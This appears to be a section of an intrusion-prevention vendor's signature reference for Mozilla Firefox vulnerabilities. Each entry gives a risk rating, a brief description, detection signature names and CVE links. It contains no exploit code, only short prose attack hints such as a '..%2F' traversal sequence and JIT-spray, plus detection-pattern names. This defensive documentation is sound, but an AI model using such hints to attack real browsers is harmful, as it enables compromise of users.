https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4064
BID-31346
http://www.securityfocus.com/bid/31346
Back to top

Mozilla-Firefox-Browser-Engine-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Mozilla Foundation Firefox
Risk: Moderate
First detected in: sgpkg-ips-229-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There is a memory corruption vulnerability in Mozilla Firefox. This flaw is due to the way Mozilla Firefox handles first-letter CSS style elements. A remote attacker can exploit this vulnerability by persuading a target user to open a malicious web page. Successful attacks can allow arbitrary code injection and execution with the security privileges of the current user. If code execution is successful, the behavior of the target depends on the intention of the attacker. In the case of an unsuccessful code execution attack, Firefox may terminate abnormally.
Situation: HTTP_SS-Mozilla-Firefox-Browser-Engine-Memory-Corruption
File-Text_Mozilla-Firefox-Browser-Engine-Memory-Corruption
References:
CVE-2009-1392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1392
BID-35326
http://www.securityfocus.com/bid/35326
OSVDB-55147
http://www.osvdb.org/55147
OSVDB-55146
http://www.osvdb.org/55146
OSVDB-55145
http://www.osvdb.org/55145
OSVDB-55144
http://www.osvdb.org/55144
Back to top

Mozilla-Firefox-Built-In-PDF-Viewer-Same-Origin-Policy-Bypass

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: A same-origin policy bypass vulnerability exists in Mozilla Firefox. The vulnerability is due to a design flaw in the built-in PDF Viewer. By enticing a target user to view a crafted page that contains malicious script code, an attacker can exploit this vulnerability to read and steal sensitive local files on the victim's computer.
Situation: File-Text_Mozilla-Firefox-Built-In-PDF-Viewer-Same-Origin-Policy-Bypass
References:
CVE-2015-4495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4495
BID-76249
http://www.securityfocus.com/bid/76249
Back to top

Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass

About this vulnerability: Privilege restriction bypass vulnerability with Mozilla Firefox chrome pages
Risk: Moderate
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Suite
Type: Malfunction
Description: A vulnerability exists in the Mozilla Firefox and Mozilla Suite in the handling of the chrome pages. By creating a specially crafted HTML page a remote attacker could try to deceive a user to execute malicious code with the chrome page privileges.
Situation: HTTP_Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass
File-Text_Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass
References:
CVE-2005-2706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2706
BID-14920
http://www.securityfocus.com/bid/14920
OSVDB-19648
http://www.osvdb.org/19648
Back to top

Mozilla-Firefox-Chrome-URL-Information-Disclosure

About this vulnerability: Mozilla Firefox Chrome URL Information Disclosure
Risk: Low
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Mozilla Firefox
Type: Malfunction
Description: A vulnerability exists in Mozilla Firefox 1.8 and prior.
Situation: File-Text_Mozilla-Firefox-Chrome-URL-Information-Disclosure
Back to top

Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-221-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There is a memory corruption vulnerability in Mozilla Firefox. This flaw is due to improper handling of a script that manipulates text objects in an HTML document. A remote attacker can exploit this vulnerability by persuading the target user to open a malicious web page.
Situation: HTTP_SS-Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption
File-Text_Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption
References:
CVE-2009-1313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1313
BID-34743
http://www.securityfocus.com/bid/34743
Back to top

Mozilla-Firefox-Constructframe-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Mozilla Firefox web browser. The vulnerability is due to an implementation error when handling the first letter frame. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious web page. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be run with privileges of the currently logged on user. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.
Situation: File-Text_Mozilla-Firefox-Constructframe-Memory-Corruption
References:
CVE-2009-2462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2462
BID-35765
http://www.securityfocus.com/bid/35765
Back to top

Mozilla-Firefox-Createimagebitmap-Integer-Overflow

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-892-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in Mozilla Firefox. A remote attacker can use this to disclose sensitive information or potentially execute arbitrary code.
Situation: File-Text_Mozilla-Firefox-Createimagebitmap-Integer-Overflow
References:
CVE-2017-5428
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5428
Back to top

Mozilla-Firefox-Cross-Domain-Information-Disclosure

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There exists an information disclosure vulnerability in Mozilla Firefox. A remote attacker can use this to access sensitive information.
Situation: File-Text_Mozilla-Firefox-Cross-Domain-Information-Disclosure
References:
CVE-2012-4192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4192
OSVDB-86126
http://www.osvdb.org/86126
Back to top

Mozilla-Firefox-CVE-2014-1510-Webidl-Implementation-Privilege-Escalation

About this vulnerability: A vulnerability in Mozilla Foundation Firefox ESR
Risk: Moderate
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla based browsers
Type: Input Validation
Description: A privilege escalation vulnerability has been reported in Mozilla Firefox, Thunderbird, and Seamonkey. The vulnerability is due to a failed security check on a chrome:// URL. An attacker could exploit this vulnerability by enticing a user to open a crafted webpage. The vulnerability could be exploited, or chained with other vulnerabilities, to execute arbitrary code in the security context of the target user.
Situation: File-Text_Mozilla-Firefox-CVE-2014-1510-Webidl-Implementation-Privilege-Escalation
References:
CVE-2014-1510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1510
BID-66206
http://www.securityfocus.com/bid/66206
OSVDB-104593
http://www.osvdb.org/104593
Back to top

Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption

About this vulnerability: Detected attempt to exploit a vulnerability in Mozilla Firefox
Risk: Moderate
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Input Validation
Description: There is a vulnerability in Mozilla Firefox.
Situation: HTTP_SS-Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption-2
HTTP_SS-Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption
File-Text_Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption
File-Text_Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption-2
References:
CVE-2010-3765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3765
BID-44425
http://www.securityfocus.com/bid/44425
Back to top

Mozilla-Firefox-Domnoderemoved-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Malfunction
Description: A memory corruption vulnerability has been discovered in the Mozilla Firefox product. The flaw concerns document structure changes during a DOMNodeRemoved event. Exploitation of this vulnerability may possibly result in arbitrary code execution on the target user's host. In the case of an unsuccessful code injection attack attempt, the vulnerable browser application will terminate. All instances of the Firefox browser will be shut down. In the case of a successful code injection attack attempt, the flow of the vulnerable process will be diverted to an arbitrary location. The behaviour of the host is at that point dependent on the intention of the injected code.
Situation: File-Text_Mozilla-Firefox-Domnoderemoved-Memory-Corruption
References:
CVE-2006-2779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2779
BID-18228
http://www.securityfocus.com/bid/18228
Back to top

Mozilla-Firefox-Domsvglength-Reflected-Attribute-Use-After-Free

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: A use after free vulnerability exists in Mozilla Firefox. The vulnerability is due to an issue with handling DOMSVGLength objects. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a malicious page. Successful exploitation could lead to arbitrary code execution under the security context of the browser.
Situation: File-TextId_Mozilla-Firefox-Domsvglength-Reflected-Attribute-Use-After-Free
References:
CVE-2014-1563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1563
OSVDB-110719
http://www.osvdb.org/110719
Back to top

Mozilla-Firefox-enablePrivilege-Vulnerable-Function

About this vulnerability: Firefox enablePrivilege vulnerable function call
Risk: Moderate
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Thunderbird; Mozilla SeaMonkey
Type: Insecure Configuration
Description: Mozilla .enablePrivilege function has been deprecated as insecure since 2012.
Situation: File-Text_Mozilla-Firefox-enablePrivilege-Vulnerable-Function
Back to top

Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: A memory corruption vulnerability exists in Mozilla Firefox Browser.
Situation: HTTP_SS-Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption
File-Text_Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption
References:
CVE-2009-1563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1563
BID-36851
http://www.securityfocus.com/bid/36851
Back to top

Mozilla-Firefox-HTTP-Index-Format-File-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Moderate
First detected in: sgpkg-ips-895-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: Improper parsing of application/http-index-format format content causes an out of bounds read vulnerability in Mozilla Firefox. A successful exploit allows an unautenticated attacker to access user information.
Situation: File-Text_Mozilla-Firefox-HTTP-Index-Format-File-Out-Of-Bounds-Read
References:
CVE-2017-5444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5444
Back to top

Mozilla-Firefox-Iconurl-Arbitrary-JavaScript-Execution

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: Low
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There exosts a vulnerability in Mozilla Firefox.
References:
CVE-2005-1477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1477
BID-13544
http://www.securityfocus.com/bid/13544
Back to top

Mozilla-Firefox-Iframe-Style-Change-Handling-Code-Execution

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There is a memory corruption vulnerability in Mozilla Firefox products. The flaw is due to improper handling of changes to style elements of IFrame objects. A remote attacker can exploit this vulnerability by persuading the target user to open a malicious webpage. Successful attacks could allow for arbitrary code injection and execution with the privileges of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Firefox may terminate abnormally.
Situation: File-Text_Mozilla-Firefox-Iframe-Style-Change-Handling-Code-Execution
References:
CVE-2008-1236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1236
BID-28448
http://www.securityfocus.com/bid/28448
Back to top

Mozilla-Firefox-Information-Disclosure-CVE-2013-1675

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: Moderate
First detected in: sgpkg-ips-1668-5242
Last changed: sgpkg-ips-1668-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: An information disclosure vulnerability has been reported in Mozilla Firefox due to the improper data structure initialisation of the nsDOMSVGZoomEvent::mPreviousScale and nsDOMSVGZoomEvent::mNewScale functions.
Situation: File-Text_Mozilla-Firefox-Information-Disclosure-CVE-2013-1675
References:
CVE-2013-1675
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1675
Back to top

Mozilla-Firefox-InstallTrigger-DoS

About this vulnerability: Mozilla Firefox InstallTrigger DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Browser
Description: A vulnerability exists in Mozilla Firefox 1.0.7 that allows remote attackers to cause a denial of service through the mishandling of a Javascript InstallTrigger.install() method.
Situation: File-Text_Mozilla-Firefox-InstallTrigger-DoS
References:
CVE-2006-1790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1790
BID-17516
http://www.securityfocus.com/bid/17516
OSVDB-24663
http://www.osvdb.org/24663
Back to top

Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There is a vulnerability in Mozilla Firefox. There is insufficient validation with JavaScript internal structures. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page, potentially leading to code execution in the context of the current user.
Situation: HTTP_SS-Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption
File-Text_Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption
References:
CVE-2009-0773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0773
BID-33990
http://www.securityfocus.com/bid/33990
Back to top

Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Buffer Overflow
Description: A remotely exploitable code execution vulnerability has been reported in the Mozilla Firefox product. The vulnerability is created as a result of a flaw in the implementation of the JavaScript focus method. Exploitation of this vulnerability may allow a malicious user to inject and execute arbitrary code on a target host within the security context of the current user. In an unsuccessful attack case, where the attack does not result in the flow of the process being diverted to injected code, the affected application will terminate. The behaviour of the target system after a successful attack is dependent on the intention of the injected code. In the case of arbitrary code execution, the code is executed within the security context of the current user.
Situation: HTTP_SS-Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow
File-Text_Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow
References:
CVE-2006-1993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1993
BID-17671
http://www.securityfocus.com/bid/17671
Back to top

Mozilla-Firefox-Jit-Code-Allocation

About this vulnerability: A vulnerability in Mozilla Firefox allowing bypass of ASLR and DEP protections
Risk: High
First detected in: sgpkg-ips-1162-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Firefox ESR; Mozilla Thunderbird
Type: Code Injection
Description: JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. A remote attacker could exploit these vulnerabilities by enticing a user to open a maliciously crafted webpage. Successful exploitation may allow arbitrary code execution with the privileges of the user.
Situation: File-Text_Mozilla-Firefox-Jit-Code-Allocation
References:
CVE-2017-5375
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5375
BID-95757
http://www.securityfocus.com/bid/95757
Back to top

Mozilla-Firefox-Jit-Code-Allocation-2

About this vulnerability: A vulnerability in Mozilla Firefox allowing bypass of ASLR and DEP protections
Risk: High
First detected in: sgpkg-ips-1162-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Firefox ESR; Mozilla Thunderbird
Type: Code Injection
Description: JIT-spray targeting asm.js combined with a heap spray allows for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. A remote attacker could exploit these vulnerabilities by enticing a user to open a maliciously crafted webpage. Successful exploitation may allow arbitrary code execution with the privileges of the user.
Situation: File-Text_Mozilla-Firefox-Jit-Code-Allocation
References:
CVE-2017-5400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5400
BID-96654
http://www.securityfocus.com/bid/96654
Back to top

Mozilla-Firefox-Jit-Compiler-Type-Confusion

About this vulnerability: An attempt to exploit a vulnerability in Mozilla Firefox detected
Risk: High
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Platform: Generic
Software: Mozilla Firefox
Type: Type Confusion
Description: An attempt to exploit a vulnerability in Mozilla Firefox detected.
Situation: File-Text_Mozilla-Firefox-Jit-Compiler-Type-Confusion
References:
CVE-2019-17026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17026
Back to top

Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Mozilla Firefox products
Risk: Moderate
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Mozilla Firefox; Mozilla SeaMonkey
Type: Malfunction
Description: There is a memory corruption vulnerability in Mozilla Firefox products. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious web site, terminating the affected application or causing arbitrary code to be executed with the privileges of the currently logged in user.
Situation: HTTP_SS-Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption
File-TextId_Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption
References:
CVE-2007-5959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5959
BID-26593
http://www.securityfocus.com/bid/26593
OSVDB-38867
http://www.osvdb.org/38867
Back to top

Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution

About this vulnerability: Command execution vulnerability in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mozilla Firefox
Type: Code Injection
Description: Mozilla Firefox has a command execution vulnerability in the handling of specially crafted arguments passed to certain registered URI handlers. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, to compromise the vulnerable system.
Situation: HTTP_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
File-Text_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
File-TextId_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
References:
CVE-2007-4041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4041
BID-25053
http://www.securityfocus.com/bid/25053
Back to top

Mozilla-Firefox-Navigator-Remote-Code-Execution

About this vulnerability: A Mozilla Firefox Navigator Remote Code Execution vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-734-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Input Validation
Description: A vulnerability in Mozilla Firefox, versions 1.5 before 1.5.0.5, which allows remote attackers to execute arbitrary code by changing certain properties of the window navigator object that are accessed when Java starts up.
Situation: File-Text_Mozilla-Firefox-Navigator-Remote-Code-Execution
References:
CVE-2006-3677
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3677
BID-19192
http://www.securityfocus.com/bid/19192
OSVDB-27559
http://www.osvdb.org/27559
Back to top

Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Mozilla Firefox
Risk: Moderate
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Mozilla Firefox
Type: Malfunction
Description: There is a memory corruption vulnerability in Mozilla Firefox. A remote attacker can exploit this vulnerability by enticing a target user to visit a malicious web page. Successful exploitation can lead to non-privileged arbitrary code execution.
Situation: HTTP_SS-Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption
File-Text_Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption
References:
CVE-2009-3070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3070
BID-36343
http://www.securityfocus.com/bid/36343
OSVDB-57971
http://www.osvdb.org/57971
Back to top

Mozilla-Firefox-nsSVGValue-Denial-Of-Service

About this vulnerability: A Mozilla Firefox nsSVGValue Denial Of Service vulnerability.
Risk: High
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: Mozilla Firefox
Type: Insecure Configuration
Description: A vulnerability in Mozilla Firefox, versions 7 and 8 before 8.0.1, where the improper handling of the notification of nsSVGValue observers can lead to and out of bounds access, which allows remote attackers to cause a denial of service condition.
Situation: File-Text_Mozilla-Firefox-Navigator-Remote-Code-Execution
References:
CVE-2011-3658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3658
OSVDB-77953
http://www.osvdb.org/77953
Back to top

Mozilla-Firefox-nsTreeRange-Use-After-Free

About this vulnerability: An attempt to exploit vulnerability in Mozilla Firefox Detected
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1329-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: A use-after-free vulnerability exists in Mozilla Firefox. The vulnerability is due to a flaw in the code that handles user-defined functions of an nsTreeSelection element, which allows freeing an object and operating on it afterwards.
Situation: HTTP_SS-Mozilla-Firefox-nsTreeRange-Use-After-Free
File-Text_Mozilla-Firefox-nsTreeRange-Use-After-Free
File-TextId_Mozilla-Firefox-nsTreeRange-Use-After-Free
References:
CVE-2011-0073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0073
BID-47663
http://www.securityfocus.com/bid/47663
OSVDB-72087
http://www.osvdb.org/72087
Back to top

Mozilla-Firefox-Object-Mchannel-Use-After-Free

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Moderate
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey
Type: Malfunction
Description: A use-after-free vulnerability exists in Mozilla Firefox. The vulnerability is due to a specific method call on an object with an unassigned mChannel, resulting in a dangling pointer. A remote attacker could exploit this vulnerability by enticing a user to visit a malicious web page. A successful attack would result in execution of arbitrary code in the security context of the browser's user. If the attack fails, Firefox may terminate abnormally.
Situation: HTTP_SS_Mozilla-Firefox-Object-Mchannel-Use-After-Free
File-Text_Mozilla-Firefox-Object-Mchannel-Use-After-Free
References:
CVE-2011-0065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0065
BID-47659
http://www.securityfocus.com/bid/47659
OSVDB-72085
http://www.osvdb.org/72085
Back to top

Mozilla-Firefox-Object-Tag-Null-Dereference

About this vulnerability: Mozilla Firefox Object Tag Null Dereference
Risk: High
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Browser
Description: A vulnerability exists in Mozilla Firefox, versions before 2.0.0.5, that allows remote attackers to cause a denial of service via a crafted value in an HTML Object tag.
Situation: File-Text_Mozilla-Firefox-Object-Tag-Null-Dereference
References:
CVE-2007-3734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3734
BID-24946
http://www.securityfocus.com/bid/24946
OSVDB-38000
http://www.osvdb.org/38000
Back to top

Mozilla-Firefox-onreadystatechange-Use-After-Free

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Thunderbird
Type: Malfunction
Description: A code execution vulnerability exists in Mozilla Firefox and Thunderbird. The vulnerability is caused by a Use-After-Free error when processing script code making use of the onreadystatechange event handler. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user. Note that this vulnerability is being actively exploited in the wild.
Situation: File-Text_Mozilla-Firefox-onreadystatechange-Use-After-Free
References:
CVE-2013-1690
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1690
BID-60778
http://www.securityfocus.com/bid/60778
OSVDB-94584
http://www.osvdb.org/94584
Back to top

Mozilla-Firefox-onUnload-SSL-Certificate-Spoofing

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There exists a vulnerability in the way products based on the Mozilla Gecko web browser engine display security settings for a web page. Using the unload event, an attacker can cause the browser load a valid certificate from a trusted web site and show the "secure padlock" icon while displaying content from a malicious web site.
Situation: File-Text_Mozilla-Firefox-onUnload-SSL-Certificate-Spoofing
Back to top

Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There is a remote code execution vulnerability in Mozilla Firefox. The vulnerability is due to improper user messaging when using the PKCS11 Module to load dynamic link libraries (DLLs). An attacker can exploit this vulnerability by customizing the dialog message to trick a user into loading a malicious DLL. In a successful attack where arbitrary code is injected and executed on the vulnerable target host, the behavior of the target system depends on the malicious code. Note that any code executed by the attacker runs with the privileges of the logged in user.
Situation: HTTP_SS-Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution
HTTP_SS-Microsoft-Killbit-Disabled-ActiveX-Object
File-Text_Microsoft-Killbit-Disabled-ActiveX-Object
File-Text_Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution
References:
CVE-2009-3076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3076
BID-36343
http://www.securityfocus.com/bid/36343
Back to top

Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer

About this vulnerability: A code execution vulnerability in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Mozilla Firefox
Type: Malfunction
Description: There is a code execution vulnerability in Mozilla Firefox. The vulnerability is due to a memory corruption while handling crafted <object> tags in HTML pages. By enticing a target user to visit a malicious web page, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer
File-Text_Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer
References:
CVE-2010-2755
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2755
BID-41933
http://www.securityfocus.com/bid/41933
OSVDB-66786
http://www.osvdb.org/66786
Back to top

Mozilla-Firefox-Prototype-Pollution-CVE-2022-1802

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: Moderate
First detected in: sgpkg-ips-1860-5242
Last changed: sgpkg-ips-1860-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: A prototype pollution vulnerability exists in Firefox ESR < 91.9.1, Firefox < 100.0.2, Firefox for Android < 100.3.0, and Thunderbird < 91.9.1. A successful exploit can result in the execution of arbitrary Javascript in a privileged context.
Situation: File-Text_Mozilla-Firefox-Prototype-Pollution-CVE-2022-1802
References:
CVE-2022-1802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1802
Back to top

Mozilla-Firefox-Remote-Code-Execution

About this vulnerability: A Mozilla Firefox Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: Mozilla Firefox
Type: Insecure Configuration
Description: A vulnerability in Mozilla Firefox, versions before 3.6.26 and 4.x through 9.0, which allows remote attackers to execute arbitrary code via access to removed nsDOMAttribute child nodes.
Situation: File-Text_JavaScript-ShellCode-Generation
References:
CVE-2011-3659
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3659
OSVDB-78736
http://www.osvdb.org/78736
Back to top

Mozilla-Firefox-Resource-URL-Handling-Directory-Traversal

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Input Validation
Description: There is a directory traversal vulnerability in Mozilla Firefox 2.0.0.4 and earlier on Mac OS X and Unix that allows a remote attacker to read arbitrary files via ..%2F sequences in a resource:// URI.
Situation: File-Text_Mozilla-Firefox-Resource-URL-Handling-Directory-Traversal
References:
CVE-2007-3072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3072
OSVDB-35920
http://www.osvdb.org/35920
Back to top

